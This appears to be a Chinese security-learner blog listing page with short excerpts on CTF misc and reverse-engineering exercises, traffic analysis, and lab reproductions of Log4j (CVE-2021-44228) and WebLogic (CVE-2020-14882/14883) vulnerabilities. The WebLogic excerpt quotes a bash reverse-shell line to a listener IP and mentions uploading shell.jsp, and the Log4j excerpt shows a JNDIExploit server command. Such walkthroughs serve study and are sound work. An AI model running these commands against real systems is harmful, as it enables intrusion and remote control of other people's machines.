自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(19)
  • 收藏
  • 关注

原创 misc3

然后将这之后的数据提取出来,命名为disk,这就是我们需要在VeraCrypt上挂载的文件,将图片分离后文件尾后面的数据命名为disk.vc,分离后的图片为NBLOGO1.png。文件末尾发现tips,放大观察可以看到这张图内叠加了一张NK的队标,有很多等距像素点,尝试等距提取然后拼接,图片大小就是tip的。打开VeraCrypt,挂在到A盘,挂载文件disk.vc,挂载密钥为NBLOGO1.png。图片尾存在zip文件,解压后得到docx文件,打开后没发现什么异常,wps打开后发现二维码。

2026-04-03 09:26:56 363

原创 RE基础4

随后通过begin,end继续循环遍历,basic_string用于开辟空间初始化字符串,~string用于回收空间,这俩组成一对,循环遍历depart函数,然后通过replace进行字符替换,然后通过lambda进行check,check全部成功后输出flag。可以看到有花指令,按正常逻辑跳转到1A+1,说明E8是多余的,然后跳转逻辑和跳转后的的地方又是紧跟的,可以推断出从74到E8可以nop掉。这题动态调试一下,就明白逻辑了,首先是把v7的值dump出来,其次是发现v11也就是cf的值是永1;

2026-04-01 15:08:05 370

原创 Misc基础2

的文件时,Windows Explorer 会尝试像处理普通文件一样调用它,但内核却认为你在操作一个设备,从而导致“功能无效”。直接打开exe是不行的,查看二进制文件发现exe是图像文件编码得到的 这串字符串是img标签的格式,直接输到浏览器即可得到图片。十六进制12,13位表示长,16,17位表示高,把高修改成和长一样,显示完整图片,获得flag。看似都是0900是真加密,其实是修改后的,这种可以修改回去。文件,不能使用常规的图形界面,必须通过命令行使用。密码2563,获得base64编码,解码即可。

2026-03-03 17:18:01 299

原创 内核驱动逆向

附件kernal.exe、kernal.sys。

2026-03-02 14:35:11 763

原创 web流量分析3

以太网缺省MTU=1500字节,这是以太网接口对IP层的约束(保证链路层的载波多路复用/冲突检测机制),如果IP层有<=1500字节的数据需要发送,只需要一个IP包就可以完成发送任务;打开流量包,依旧二分法,先看stream0,stream60,再看stream30,结果30就是secret。编写解密脚本,先base64解密,再AES解密,获得json数据,msg信息里仍要base64解码。也就是说当要发送的数据小于1500字节时,这个地方的数据变得没有意义,这里就是一个隐蔽通道。

2026-02-26 17:11:06 654

原创 Reverse基础3

异或完成后,执行了一个5c0函数,var_64这里是异或后得字符串,var_30是要比较得字符串,在经过5c0函数后var_64得字符串又经过了异或放到了var_88这里,随后var_88和var_30进行比较,相同则是flag。1.先是输入字符,通过XMM函数做了变换,通过动态调试,发现FP的数据结构是这样的,再结合代码发现是递归,第一个想到的是树的遍历,所以这里是树的后序遍历。3.现在有一个问题,就是输入是31个字符,最后却出来62个字符,查了一下这个函数,进行还原。

2026-02-26 16:43:15 607

原创 Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

默认开启1389端口和8080端口,注意burp也是默认8080端口,所以要改一下burp的8080端口。使用java -jar JNDIExploit-2.0-SNAPSHOT.jar -i ip1。tasklist | findstr pid号 查看pid号是什么服务。Stop-Process -Id 38040 -Force 关闭该服务。netstat -ano | findstr :8080 查看端口占用。因为目标JDK版本是8u102,低于8u191,所以我们可以使用。

2026-02-14 10:32:10 19

原创 Reverse基础2

中间会有一个反调试的东西,将原来的jz,patch成jnz即可,注意这样的话调试可以正常执行,不调试的花就不能正常执行了,因为test eax,eax返回1,jz就是0跳转,jnz就是非0跳转,我们让他跳转,改成jnz就行了,但是不调试的话,test eax,eax返回0哦。# 执行以下命令,会显示由 PyInstaller 打包的 .exe 文件中的内容,然后利用 x filename 命令提取文件,并命名为.pyc文件。也就是说,只要游戏通关了,程序就会把flag打印出来,也就是那个GetKey。

2026-02-11 10:37:30 670

原创 weblogic漏洞复现

CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。这种直接插入到java里执行,对符号有很严格的要求,比如直接把bash -i >& /dev/tcp/192.168.1.195/4444 0>&1放到exec里,反弹shell会失败,Java会解析错误。发送后,访问127.0.0.1:7001/bea_wls_internal/shell.jsp,页面为空白说明上传成功有这个文件。

2026-02-11 10:28:27 550

原创 web流量分析2

get后是sql注入,导出为CSV打开,只保留最后一个数,如图所示,可以看见第一个字符是f这道题在流量包里其实有一段被忽视的关键文字提示“呀吼(Yaaaaaaar),那是陆地!嘿 Wesley,你拿到那个 flag 了吗?“哎(Ayy),文件就在我这儿呢,伙计(Matey)!这就是通往宝藏(booty)的地图!“我不明白,这甚至根本不是一张地图”“呀吼!宝藏就埋在地图所指向的东西的名字里!(不要空格,不要大写)“哎,我要走了。但记住,

2026-01-20 18:09:30 766

原创 Reverse基础

回到主函数,可以看到想要跳出循环,必须要满足两个if,先看第二个if,v3是被赋值的,我们进入到4011A0里,找到如下图,看到EA跳到EA+2,还有单个的aaa,这显然不正常,下面两个红色的箭头也是在脱裤子放屁,说明这里就是问题所在。还有一点没有分析,就是这段代码,其实这是字符转十六进制的一段代码,我们反求的本来就是十六进制,所以出题人才要用md5(因为md5的参数是十六进制)打上断点,按f9,输入user,password,看ecx的值,按八次f9把所有ecx的写下来就可以写脚本了。

2026-01-15 17:43:16 994

原创 UPX手动脱壳

然后一路f8,直到看见一个jmp寄存器的值的命令,这里即将回到OEP,f7一下。f7步入,会看到三个向上的小循环,在最后一个循环下面打上断点,f9继续执行。执行一个idc脚本把内存dump下来,ida分析dumpfile即可。四处小写的upx为错误标志,改大写UPX即可用工具正常脱壳。此时,rdi就是main函数,也就是图里的400E28。将二进制程序和ida调试程序放一起,然后运行调试程序。第一个函数先f7进入,然后f7进入下一个函数。一路f8步过,直到看见一个执行类似于段的函数。

2026-01-12 14:23:20 469

原创 Chocolatey安装

Chocolatey 是 windows 下一款命令行包管理软件 ,简单说这就是 Windows 的 apt-get。习惯 Linux 操作方式并非常想用它操纵 Windows 的敬请折腾。Chocolatey 这套包管理系统目前已经包含了近 500 多款常用软件。

2026-01-11 17:43:33 325

原创 文件头标识(十六进制)

文件头标识(HEX)RLE压缩的前5字节。

2026-01-09 10:39:12 303

原创 web流量分析

客户端发送的命令,要求服务器进入被动模式(Passive Mode),以便客户端主动连接服务器的数据端口进行数据传输。再往下看是base64编码的image001.png的文件,按照3.1数据包中的线索的方法还原成照片。导出后会发现有很多的png,js,css等文件,每个图片打开一下,发现logo.png是旗帜的样式。发现全是http协议,点开几个能看见有png的字样,把http的东西导出下来分析。在导出的文件里,有两个文件比较可疑,hint.html,secret.zip,

2026-01-08 14:55:30 639

原创 Misc基础

十六进制编辑器打开,看到ffd9后面还有东西,说明有隐藏,504b0304是zip的文件头,提取出来写成zip(binwalk扫描,然后binwalk -e也可以直接提取zip)可以得到一个output.txt文件,用十六进制编辑器打开发现其为一个压缩包,并且还存在伪加密,将文件后缀改为.zip并将加密位01改为00,即可得到flag。使用ARCHPR工具,选定参数,破解得到密码为3690。下载下来一个压缩包,打开是一张图片,先解压,发现容量还挺大的一定有隐藏,用十六进制编辑器打开后在尾部发现问题。

2026-01-08 14:49:28 563

原创 关闭基于虚拟化的安全性(VBS)

例如:cd C:\Users\Administrator\Desktop\dgreadiness_v3.6(命令行右键粘贴)并回车——输入dir/ls并回车查看当前目录内容是否为脚本目录。链接:https://www.microsoft.com/en-us/download/details.aspx?5、输入.\DG_Readiness_Tool_v3.6.ps1 -Disable(注意前面有个点)并回车,输入R,回车——等待运行完成。需求:ensp的路由器40报错需要关闭vbs。

2026-01-05 19:46:20 704

原创 密码基础版

RSA算法是现今使用最广泛的公钥密码算法,也是号称地球上最安全的加密算法。在了解RSA算法之前,先熟悉下几个术语根据密钥的使用方法,可以将密码分为对称密码和公钥密码对称密码:加密和解密使用同一种密钥的方式公钥密码:加密和解密使用不同的密码的方式,因此公钥密码通常也称为非对称密码。

2025-09-22 17:16:42 1348

原创 Web基础学习-SQL

MYSQL数据库的包容性比较强。例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。如果闭合后形成的sql语句是错误的,那么sql语句执行就会错误,从而造成页面显示错误。

2025-09-10 16:10:25 920

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除